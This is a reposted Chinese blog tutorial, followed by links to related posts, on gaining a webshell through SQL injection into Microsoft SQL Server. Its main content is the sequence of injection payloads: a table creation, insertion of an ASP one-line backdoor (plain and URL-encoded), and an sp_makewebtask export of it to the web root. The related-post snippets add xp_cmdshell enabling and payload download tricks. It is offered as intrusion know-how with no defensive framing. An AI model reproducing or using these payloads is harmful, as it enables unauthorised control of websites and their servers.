MSSQL下拿WEBSEHLL

最新推荐文章于 2024-04-02 14:17:25 发布
最新推荐文章于 2024-04-02 14:17:25 发布
阅读量106 收藏
点赞数
文章标签: python 数据库
原文链接:https://my.oschina.net/changpinghu/blog/92532
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

MSSQL的注入是一种非常复杂和有效的入侵技术,其作用当然不仅仅只是通过注入点得到管理用的密

码,再用用密码登陆网站的管理后台这种比较笨的利用方法.当MSSQL注入点为DB-ONWER权限时,而同时数据库

和WEB是在同一台主机上, 满足这二个条件时,可能通过得到WEB路径,再将一字话木马写入一个表,再利用

MSSQL语句将其导出为一个脚本文件的方法得到一个后门,再上传大木马的方法得到WEBSEHLL.

第一步:确定网站的WEB路径,通过DIRTREE逐个查看硬盘及文件夹查找WEB目录 

第二步.得到WEB路径后,建一个表.字段类型为CHAR长度为255,这个表将来用作插入一句话木马,使用语句

;create table pcguest(pc char(255));--

第三步,将一句话木马插入表中,使用

;insert into pcguest(pc) values ('<%execute request("p")%>')--

其中<%execute request("p")%>就是一句话木马,但是由于是在链接地址提交的,所以涉及到字符转

换问题,将一句话木马中的< > % " 字符转换成unicode格式,,如修改后的一句话木马代码为

%3c%25execute request(%22p%22)%25%3e

完整的MSSQL语句为

;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--

第四步,将表导出为一个ASP的文件

;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--

最后在网页上连接ASP一句话木马上传大马,即拿到WEBSEHLL

 

来源于 :B.B.S.T信息安全团队 www.hackbadboy.com

 


原文链接: http://blog.csdn.net/mypc2010/article/details/7983980

转载于:https://my.oschina.net/changpinghu/blog/92532

weixin_34381666
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mssql基础(二)——get shell的的方式
7Riven's blog
11-06 554
测试环境windows-server-2003+sql sever2005 1.利用存储过程拿shell 允许修改高级参数:;exec sp_configure'show advanced options',1; 根据提示使用reconfigure语句进行安装 打开xp_cmdshell扩展:exec sp_configure'xp_cmdshell',1; 再次执行reco...
利用MSSQL getshell
热门推荐
浅笑996的博客
11-17 1万+
此次复现使用的sql server 2000 和sql server 2008两个环境进行的 是在已知数据库密码的基础上进行的 0x01 MSSQL连接 连接MSSQL 2000 新建连接: 填写目的IP、目的端口、用户名、密码: 一直下一步,完成后,数据库导航窗口会出现一个连接,双击连接: 若是第一次连接,双击会提示下载驱动文件,若不成功,需多次反复尝试 新建SQL编辑器即可执行SQL语...
BBSXP7 mssql版,从注入到拿WEBSHELL
HackCode的专栏
07-26 728
 BBSXP7 mssql版,从注入到拿WEBSHELL这个东西是去年前发现的了。好象内容细节在哪个杂志上发了。不过似乎杂志和作者都没跟我联系呢?不管,发了再说。针对BBSXP7的,是HTTP头注入。没有多大的看头,熟悉的朋友,请从后面拿SHELL的地方开始看。反正看得懂的就看。看不懂的请提问,不过希望大家问一点有水平的问题。太基础的,GOOGLE上可以搜索到的问题,恕我不回答。我们都知道yuzi
【mssql实验】Mssqlgetshell
一剑开天门!的博客
03-07 1139
【mssql实验】Mssqlgetshell
mssql 日志备份getshell
qq_82303224_的博客
04-24 296
第二个disk = 写入webshell的网站物理地址。(根目录写不进去可以考虑网站上传目录)二:差异备份:(数据库很小时使用,大了会不成功)bitsadmin 下载文件并写入系统启动项。如果有waf的话可以考虑换个一句话写入。第一个disk = 有权限写入的目录。开启 xp_cmdshell。certutil 下载文件。
Webshell马全套
09-29
黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
非常好用的webshell
04-10
非常好用的webshell
safe3 webshell扫描工具
04-25
虽然现在已有防火墙、杀毒、入侵检测等安全防范手段,但防火墙对Web入侵基本没有作用,杀毒软件更是对变形webshell显得无力,由此导致的网页被篡改或挂马屡见不鲜。目前专门针对Web安全的工具还很少,Safe3 WebShell...
获得网站WEBSHELL权限的截图0.pdf
10-04
学习目标:在获得管理员帐号的情况下,进入网站的管理员后台,以备份数据库得到 WEBSEHLL 。 知识要点: 1. 信息搜集:在入侵网站之前,信息搜集是第一步,任何情况的搜集,当情况搜集有初步成果之后,应该首先...
php实现Linux服务器木马排查及加固功能
01-20
做一些改进,基本上能把这个问题解决,因为discuz x等程序存在漏洞,被上传了websehll,每次被删除过段时间又出来了,最终查到所有的木马。 从以下几个方面查找并加强(如果能不开启会员功能,不给任何上传入口,保护...
MSSQL WEB在线管理V2.0版
12-06
MSSQL WEB在线管理V2.0版 for .NET2.0
MSsqlL注入取得网站路径最好的方法.txt
07-18
MSsqlL注入取得网站路径最好的方法
Web Data Administrator汉化版(MSSQL数据库在线管理)
06-24
使用ASP.NET通过WEB方式来实现进行数据维护和管理,实现以下功能的:新建和编辑数据库、运行SQL语法、导入导出数据 汉化程度90% 经测试可以管理sql2000和sql2005。支持NET1.1和NET2.0。
mssql数据库提权之——xp_cmdshell执行系统命令
01-19
条件 所谓利用数据进行提权,利用的其实是数据库的运行权限,所以只要我们满足以下条件即可进行提权: 1、 必须获得sa的账号密码或者与sa相同权限的账号密码,且mssql没有被降权。 2、 必须可以以某种方式执行sql语句,例如:webshell或者是1433端口的连接。 提权基本思路过程与原理 1.MSSQL在Windows server类的操作系统上,默认具有system权限。System权限在Windows server2003中权限仅比管理员小;而在2003以上的版本,则为最高权限。 2.获取webshell之后可尝试在服务器各个站点的目录寻找sa的密码(某些站点直接在web应用程序中使
Mysql数据库getshell方法
最新发布
weixin_68408599的博客
04-02 1307
今天摸鱼时候,突然有人问我不同的数据库getshell的方式,一时间我想到了mysql还有redis未授权访问到getshell的方式,但是仅仅第一时间只想到了这两种,我有查了查资料,找到了上面两种数据库getshell的补充,以及其他数据库getshell的方式。因此更新一个专栏,各个数据库getshell的方式。
mssql 获取网站绝对路径写shell
问题很多的小明
08-13 3141
1 存在sql注入 创建表 GET /get.asp?act_id=52;create+table+gogotest+(tmp+varchar(1000));----&user_name=123 HTTP/1.1 Host: 360gongfang.com Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel M
one方法报错 select_MSSQL GetShell方法总结
weixin_36215861的博客
01-06 283
0x01 环境准备windows2008+MSSQL2008+iis7windows2003+MSSQL2005+iis608和05的mssql还是有些区别的05以下系统权限为system08以上系统权限就不是system了,看到好几种,比较多的是network service0x02 通过命令下载文件得到shellcertutil这个用的比较多,别的也没有试过,这篇文章比较详细http...
SQL Server从0到1——写shell
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
01-07 807
exec master.sys.sp_addextendedproc 'xp_cmdshell','C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll' 虽然是写shell,但是xp_cmdshell更多的是用来提权,具体原因其实思考一下就明白了。接下来我们的思路就是创建一张临时表来接收命令执行返回的内容,然后我们在通过查临时表来获取数据。注意:如果xp_cmdshell被删除了,需要自己上传xplog70.dll进行恢复。
Mysql写shell的几种方式
Redredredfish的博客
08-23 7680
Mysql写shell的几种方式 当我们拿到数据库权限时,可通过数据库管理工具写入webshell到目标服务器上,利用webshell控制目标服务器。 复现环境: phpstudy_pro 8.1.0.6 mysql 5.7.26 root权限 网站绝对路径为D:\phpstudy_pro\WWW 利用方式: 通过outfile写入shell 尝试通过outfile写入文件 报错[Code: 1290, SQL State: HY000]The MySQL server is running with
MYSQL注入获取web路径的几个方法。
yihuliunian的博客
09-09 2613
转载自品略图书馆http://www.pinlue.com/article/2019/12/0216/469828704510.html 我们在MYSQL注入的时候经常会碰到无法立即根据在注入点加单引号提交得到的返回信息来获得web目录,这个时候获得web路径就要费点劲了! 针对这种情况,我介绍三种方法!load_file(char(47))查找部分*nix系统的目录。 a. 原理 由于load_file()函数相当于*nix中的cat函数,而在某些FreeBSD,Sunos系统中用cat /..

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值